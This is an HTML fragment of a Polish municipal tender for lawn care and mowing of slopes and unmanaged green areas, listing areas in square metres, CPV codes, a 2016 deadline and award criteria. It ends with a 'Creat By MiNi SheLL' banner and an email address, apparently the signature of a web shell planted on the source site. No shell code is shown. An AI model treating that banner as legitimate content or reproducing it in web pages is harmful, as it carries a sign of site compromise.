7)Teren zieleni urządzonej - ul. Żelazna (dz. nr 3-167/14, 3-170) 
8)Teren zieleni urządzonej - ul. Żelazna (dz. nr 3-171/9, 3-172, 3-171/8,) - teren przy  przystanku i parkingu dworca autobusowego 
9)Teren zieleni urządzonej Plac Wolności 37 
10)Teren zieleni urządzonej przy OSP ul. Mickiewicza 
11)Teren zieleni urządzonej przy Pomniku św. Jana Pawła II, ul. ks. J. Popiełuszki wraz z utrzymaniem w czystości alejek  utwardzonych
3.  Pielęgnacja trawników
Trawniki dywanowe wzdłuż ul. 1-go Maja na odcinku od budynku nr 15 do budynku nr 49    
1)Koszenie trawników dywanowych wg wartości jednostkowej za 1 koszenie =ok. 691 m2
2)Grabienie trawników - wiosenne i jesienne wg wartości jednostkowej za 1 grabienie =ok. 691 m2
3)Pielęgnacja i utrzymanie trawników dywanowych  ok. 691 m2  miesięcznie 
4)Odtwarzanie fragmentów wydeptanych,  zniszczonych trawników lub zakładanie   
nowych trawników z siewu  ok. 120 m2
5)Trawniki dywanowe  wg godzin pracy kosiarki spalinowej -  ok. 50 godzin 
4.Szczegółowy opis i zakres rzeczowy przedmiotu zamówienia dla Części 1 przedmiotu  zamówienia został przedstawiony  w załączniku nr 1 do Opisu przedmiotu zamówienia Rozdziału  III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6, 77.31.30.00-7, 77.31.41.00-5, 77.34.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. Skarpy, tereny zieleni nie urządzonej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla Części 2 przedmiotu zamówienia obejmuje : 
1.Skarpy i przylegające tereny płaskie.
koszenie za pomocą kos spalinowych wg wartości jednostkowych za 1 koszenie danego terenu -   ogółem ok. 26 721 m2. 
Zakres czynności obejmuje 2-krotne koszenie w sezonie za pomocą kos spalinowych wraz z wygrabieniem skoszonej trawy i jej wywiezieniem na miejsce składowania 
2.Tereny zieleni nie urządzonej.
1)Tereny zieleni nie urządzonej przewidzianych do wykaszania wg wartości   
jednostkowych  za 1 koszenie danego terenu - ogółem ok. 17 102,80 m2.
Zakres czynności obejmuje 2 - krotne koszenie w sezonie za pomocą kos  
spalinowych  wraz   z  wygrabieniem skoszonej trawy i wywiezieniem jej na miejsce 
składowania.
2)Tereny zieleni nie urządzonej przewidziane do wykaszania wg godz. pracy kosy 
spalinowej - ok. 50 godz. 
3.Szczegółowy opis i zakres rzeczowy przedmiotu zamówienia dla Części 2 przedmiotu zamówienia został przedstawiony  w załączniku nr 2 do Opisu przedmiotu zamówienia  Rozdziału  III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com